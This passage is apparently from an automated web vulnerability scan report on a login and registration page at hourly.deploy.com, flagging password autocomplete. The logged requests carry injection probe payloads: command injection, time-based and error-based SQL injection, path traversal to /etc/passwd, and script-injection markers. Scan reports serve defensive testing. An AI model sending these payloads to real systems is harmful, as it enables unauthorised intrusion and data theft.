User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.60. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=body%7bx:expression(netsparker(0x000041))%7d

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt=body%7Bx:expression(netsparker(0x000041))%7D HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:50 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:50 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=body%7bx:expression(netsparker(0x000041))%7d" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.61. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.62. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%2Bresponse.write(268409241-22)%2B%22

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%22%2Bresponse.write(268409241-22)%2B%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%2Bresponse.write(268409241-22)%2B%22" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.63. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%3c%25+response.write(268409241-22)+%25%3e

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%3c%25+response.write(268409241-22)+%25%3e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%3c%25+response.write(268409241-22)+%25%3e" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.64. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.65. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1);WAITFOR%20DELAY%20%270:0:25%27--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1);WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1);WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.66. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=response.write(268409241-22)%27

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=response.write(268409241-22)%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=response.write(268409241-22)%27" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.67. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.68. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27))%3BSELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%27))%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27))%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.69. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(select+sleep(25))a--+1

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=(select+sleep(25))a--+1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(select+sleep(25))a--+1" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.70. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../proc/self/fd/2 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.71. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-1+OR+1%3d1

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=-1+OR+1%3d1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-1+OR+1%3d1" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.72. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+%221%22%3D%22" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.73. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../../etc/passwd HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.74. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=%22%3e%3cnet%20sparker=netsparker(0x000029)%3e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt=%22%3E%3Cnet%20sparker=netsparker(0x000029)%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=%22%3e%3cnet%20sparker=netsparker(0x000029)%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.75. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=%2527%2522--%253e%253c%252fstyle%253e%253c%252fscript%253e%253cscript%253enetsparker%25280x000007%2529%253c%252fscript%253e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000007%2529%253C%252Fscript%253E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:37 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=%2527%2522--%253e%253c%252fstyle%253e%253c%252fscript%253e%253cscript%253enetsparker%25280x000007%2529%253c%252fscript%253e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.76. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=SELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=SELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
